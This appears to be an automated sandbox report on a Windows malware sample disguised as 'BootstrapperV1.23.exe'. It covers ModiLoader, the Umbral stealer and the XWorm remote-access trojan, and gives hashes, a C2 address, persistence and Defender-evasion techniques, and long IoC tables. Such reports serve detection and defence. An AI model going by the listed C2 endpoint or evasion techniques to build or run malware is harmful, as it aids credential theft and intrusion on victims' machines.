modiloader | 073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce

Analysis

max time kernel
143s
max time network
149s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
14-11-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperV1.23.exe
Size

800KB
MD5

7198fa10a50ea9aaf6ae5c2a05af2104
SHA1

c35a2a73313e3c5ad08136e3bc583bb9bc26964c
SHA256

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
SHA512

56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf
SSDEEP

12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0

Score

10^/10

modiloader umbral xworm defense_evasion discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:26848

23.ip.gl.ply.gg:26848

Attributes

Install_directory
%Userprofile%
install_file
Windows Security Host.exe

Signatures

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Injector.exe	family_umbral
behavioral1/memory/5080-28-0x0000025BEFA70000-0x0000025BEFAB0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe	family_xworm
behavioral1/memory/3780-35-0x0000000000970000-0x000000000098A000-memory.dmp	family_xworm

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

ModiLoader Second Stage 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\znrubj.exe	modiloader_stage2
behavioral1/memory/1792-1026-0x0000000000400000-0x000000000046A000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2096	powershell.exe
3904	powershell.exe
2868	powershell.exe
1984	powershell.exe
2824	powershell.exe
3180	powershell.exe
1240	powershell.exe
2908	powershell.exe
3620	powershell.exe
1300	powershell.exe
556	powershell.exe
3604	powershell.exe
8	powershell.exe
3516	powershell.exe
836	powershell.exe
4320	powershell.exe
1000	powershell.exe
3292	powershell.exe
4892	powershell.exe
4000	powershell.exe
3436	powershell.exe
688	powershell.exe
3568	powershell.exe
3100	powershell.exe
2376	powershell.exe
456	powershell.exe
4260	powershell.exe
228	powershell.exe
736	powershell.exe
4472	powershell.exe
3740	powershell.exe
2296	powershell.exe
4000	powershell.exe
2292	powershell.exe
4940	powershell.exe
3332	powershell.exe
3436	powershell.exe
3152	powershell.exe
2828	powershell.exe
2284	powershell.exe
4496	powershell.exe
1204	powershell.exe
2988	powershell.exe
2788	powershell.exe
2332	powershell.exe
3904	powershell.exe
5060	powershell.exe
1776	powershell.exe
2308	powershell.exe
384	powershell.exe
3924	powershell.exe
4908	powershell.exe
1464	powershell.exe
776	powershell.exe
4460	powershell.exe
2588	powershell.exe
4036	powershell.exe
1184	powershell.exe
4652	powershell.exe
1648	powershell.exe
4308	powershell.exe
4652	powershell.exe
3764	powershell.exe
1036	powershell.exe

Drops file in Drivers directory 15 IoCs

Processes:

Injector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exeInjector.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe

Checks computer location settings 2 TTPs 59 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeWindows Security Host.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeWindows Security Host.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exeBootstrapperV1.23.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	Windows Security Host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	Windows Security Host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	BootstrapperV1.23.exe

Drops startup file 4 IoCs

Processes:

Windows Security Host.exeWindows Security Host.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe

Executes dropped EXE 64 IoCs

Processes:

Injector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exeInjector.exeWindows Security Host.exe

pid	process
5080	Injector.exe
3780	Windows Security Host.exe
1684	Injector.exe
3004	Windows Security Host.exe
2708	Injector.exe
1460	Windows Security Host.exe
3052	Injector.exe
1028	Windows Security Host.exe
2300	Injector.exe
2984	Windows Security Host.exe
4604	Injector.exe
748	Windows Security Host.exe
2216	Injector.exe
3736	Windows Security Host.exe
2860	Injector.exe
2132	Windows Security Host.exe
3976	Injector.exe
1372	Windows Security Host.exe
4788	Injector.exe
2208	Windows Security Host.exe
1588	Injector.exe
2492	Windows Security Host.exe
4588	Injector.exe
4392	Windows Security Host.exe
1380	Injector.exe
2864	Windows Security Host.exe
2216	Injector.exe
2200	Windows Security Host.exe
1592	Injector.exe
2820	Windows Security Host.exe
4172	Injector.exe
2032	Windows Security Host.exe
4092	Injector.exe
736	Windows Security Host.exe
228	Injector.exe
2040	Windows Security Host.exe
3084	Injector.exe
3856	Windows Security Host.exe
872	Injector.exe
2132	Windows Security Host.exe
3068	Injector.exe
5052	Windows Security Host.exe
3004	Injector.exe
2604	Windows Security Host.exe
4968	Injector.exe
2056	Windows Security Host.exe
1928	Injector.exe
456	Windows Security Host.exe
868	Injector.exe
4492	Windows Security Host.exe
2892	Injector.exe
2944	Windows Security Host.exe
3332	Injector.exe
4200	Windows Security Host.exe
2984	Injector.exe
2492	Windows Security Host.exe
4292	Injector.exe
2988	Windows Security Host.exe
2788	Injector.exe
3900	Windows Security Host.exe
3272	Injector.exe
4092	Windows Security Host.exe
2880	Injector.exe
2372	Windows Security Host.exe

Impair Defenses: Safe Mode Boot 1 TTPs 7 IoCs

defense_evasion

Safe Mode Boot

T1562.009

Processes:

znrubj.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power	znrubj.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys	znrubj.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc	znrubj.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend	znrubj.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager	znrubj.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys	znrubj.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc	znrubj.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Windows Security Host.exeWindows Security Host.exeznrubj.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe"	Windows Security Host.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe"	Windows Security Host.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\znrubj.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\znrubj.exe"	znrubj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 30 IoCs

Web Service

T1102

Processes:

flow	ioc
141	discord.com
142	discord.com
164	discord.com
25	discord.com
70	discord.com
114	discord.com
78	discord.com
148	discord.com
24	discord.com
40	discord.com
62	discord.com
157	discord.com
41	discord.com
93	discord.com
124	discord.com
94	discord.com
115	discord.com
163	discord.com
71	discord.com
79	discord.com
149	discord.com
107	discord.com
123	discord.com
132	discord.com
133	discord.com
100	discord.com
101	discord.com
108	discord.com
61	discord.com
156	discord.com

Looks up external IP address via web service 16 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
19	ip-api.com
66	ip-api.com
83	ip-api.com
97	ip-api.com
111	ip-api.com
128	ip-api.com
145	ip-api.com
32	ip-api.com
74	ip-api.com
104	ip-api.com
53	ip-api.com
118	ip-api.com
152	ip-api.com
138	ip-api.com
160	ip-api.com
167	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

znrubj.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language znrubj.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	znrubj.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 30 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEcmd.execmd.execmd.exePING.EXEcmd.exePING.EXEcmd.exePING.EXEcmd.exePING.EXEPING.EXEcmd.exePING.EXEcmd.exePING.EXEcmd.execmd.execmd.exePING.EXEcmd.exePING.EXEcmd.execmd.exePING.EXEPING.EXEPING.EXEPING.EXEcmd.exePING.EXE

pid	process
1640	PING.EXE
4064	cmd.exe
1984	cmd.exe
1828	cmd.exe
456	PING.EXE
2820	cmd.exe
2804	PING.EXE
3528	cmd.exe
2908	PING.EXE
1672	cmd.exe
4948	PING.EXE
2332	PING.EXE
3584	cmd.exe
324	PING.EXE
2064	cmd.exe
320	PING.EXE
4452	cmd.exe
388	cmd.exe
4476	cmd.exe
1072	PING.EXE
4928	cmd.exe
2908	PING.EXE
4432	cmd.exe
3144	cmd.exe
3244	PING.EXE
4156	PING.EXE
5004	PING.EXE
3748	PING.EXE
1596	cmd.exe
4160	PING.EXE

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1996 timeout.exe

pid	process
1996	timeout.exe

Detects videocard installed 1 TTPs 15 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exe

pid	process
3220	wmic.exe
4904	wmic.exe
4052	wmic.exe
4468	wmic.exe
4024	wmic.exe
4952	wmic.exe
2032	wmic.exe
4620	wmic.exe
4244	wmic.exe
3920	wmic.exe
4092	wmic.exe
2908	wmic.exe
4876	wmic.exe
3968	wmic.exe
4312	wmic.exe

Runs ping.exe 1 TTPs 15 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
2908	PING.EXE
5004	PING.EXE
3244	PING.EXE
4156	PING.EXE
320	PING.EXE
4948	PING.EXE
3748	PING.EXE
456	PING.EXE
1640	PING.EXE
2332	PING.EXE
4160	PING.EXE
2804	PING.EXE
324	PING.EXE
2908	PING.EXE
1072	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

wmic.exeInjector.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exewmic.exeWindows Security Host.exepowershell.exewmic.exewmic.exeInjector.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exe

pid	process
2916	wmic.exe
2916	wmic.exe
2916	wmic.exe
2916	wmic.exe
5080	Injector.exe
3436	powershell.exe
3436	powershell.exe
556	powershell.exe
556	powershell.exe
3332	powershell.exe
3332	powershell.exe
3604	powershell.exe
3604	powershell.exe
416	powershell.exe
416	powershell.exe
4320	powershell.exe
4320	powershell.exe
3944	powershell.exe
3944	powershell.exe
688	powershell.exe
688	powershell.exe
4636	wmic.exe
4636	wmic.exe
4636	wmic.exe
4636	wmic.exe
396	wmic.exe
396	wmic.exe
396	wmic.exe
396	wmic.exe
1492	wmic.exe
1492	wmic.exe
1492	wmic.exe
1492	wmic.exe
3780	Windows Security Host.exe
2788	powershell.exe
2788	powershell.exe
4904	wmic.exe
4904	wmic.exe
4904	wmic.exe
4904	wmic.exe
2780	wmic.exe
2780	wmic.exe
2780	wmic.exe
2780	wmic.exe
2300	Injector.exe
2300	Injector.exe
2868	powershell.exe
2868	powershell.exe
2868	powershell.exe
3436	powershell.exe
3436	powershell.exe
3436	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
3912	wmic.exe
3912	wmic.exe
3912	wmic.exe
3912	wmic.exe
1028	wmic.exe
1028	wmic.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Windows Security Host.exeInjector.exewmic.exeWindows Security Host.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3780	Windows Security Host.exe
Token: SeDebugPrivilege	5080	Injector.exe
Token: SeIncreaseQuotaPrivilege	2916	wmic.exe
Token: SeSecurityPrivilege	2916	wmic.exe
Token: SeTakeOwnershipPrivilege	2916	wmic.exe
Token: SeLoadDriverPrivilege	2916	wmic.exe
Token: SeSystemProfilePrivilege	2916	wmic.exe
Token: SeSystemtimePrivilege	2916	wmic.exe
Token: SeProfSingleProcessPrivilege	2916	wmic.exe
Token: SeIncBasePriorityPrivilege	2916	wmic.exe
Token: SeCreatePagefilePrivilege	2916	wmic.exe
Token: SeBackupPrivilege	2916	wmic.exe
Token: SeRestorePrivilege	2916	wmic.exe
Token: SeShutdownPrivilege	2916	wmic.exe
Token: SeDebugPrivilege	2916	wmic.exe
Token: SeSystemEnvironmentPrivilege	2916	wmic.exe
Token: SeRemoteShutdownPrivilege	2916	wmic.exe
Token: SeUndockPrivilege	2916	wmic.exe
Token: SeManageVolumePrivilege	2916	wmic.exe
Token: 33	2916	wmic.exe
Token: 34	2916	wmic.exe
Token: 35	2916	wmic.exe
Token: 36	2916	wmic.exe
Token: SeIncreaseQuotaPrivilege	2916	wmic.exe
Token: SeSecurityPrivilege	2916	wmic.exe
Token: SeTakeOwnershipPrivilege	2916	wmic.exe
Token: SeLoadDriverPrivilege	2916	wmic.exe
Token: SeSystemProfilePrivilege	2916	wmic.exe
Token: SeSystemtimePrivilege	2916	wmic.exe
Token: SeProfSingleProcessPrivilege	2916	wmic.exe
Token: SeIncBasePriorityPrivilege	2916	wmic.exe
Token: SeCreatePagefilePrivilege	2916	wmic.exe
Token: SeBackupPrivilege	2916	wmic.exe
Token: SeRestorePrivilege	2916	wmic.exe
Token: SeShutdownPrivilege	2916	wmic.exe
Token: SeDebugPrivilege	2916	wmic.exe
Token: SeSystemEnvironmentPrivilege	2916	wmic.exe
Token: SeRemoteShutdownPrivilege	2916	wmic.exe
Token: SeUndockPrivilege	2916	wmic.exe
Token: SeManageVolumePrivilege	2916	wmic.exe
Token: 33	2916	wmic.exe
Token: 34	2916	wmic.exe
Token: 35	2916	wmic.exe
Token: 36	2916	wmic.exe
Token: SeDebugPrivilege	3004	Windows Security Host.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeIncreaseQuotaPrivilege	3436	powershell.exe
Token: SeSecurityPrivilege	3436	powershell.exe
Token: SeTakeOwnershipPrivilege	3436	powershell.exe
Token: SeLoadDriverPrivilege	3436	powershell.exe
Token: SeSystemProfilePrivilege	3436	powershell.exe
Token: SeSystemtimePrivilege	3436	powershell.exe
Token: SeProfSingleProcessPrivilege	3436	powershell.exe
Token: SeIncBasePriorityPrivilege	3436	powershell.exe
Token: SeCreatePagefilePrivilege	3436	powershell.exe
Token: SeBackupPrivilege	3436	powershell.exe
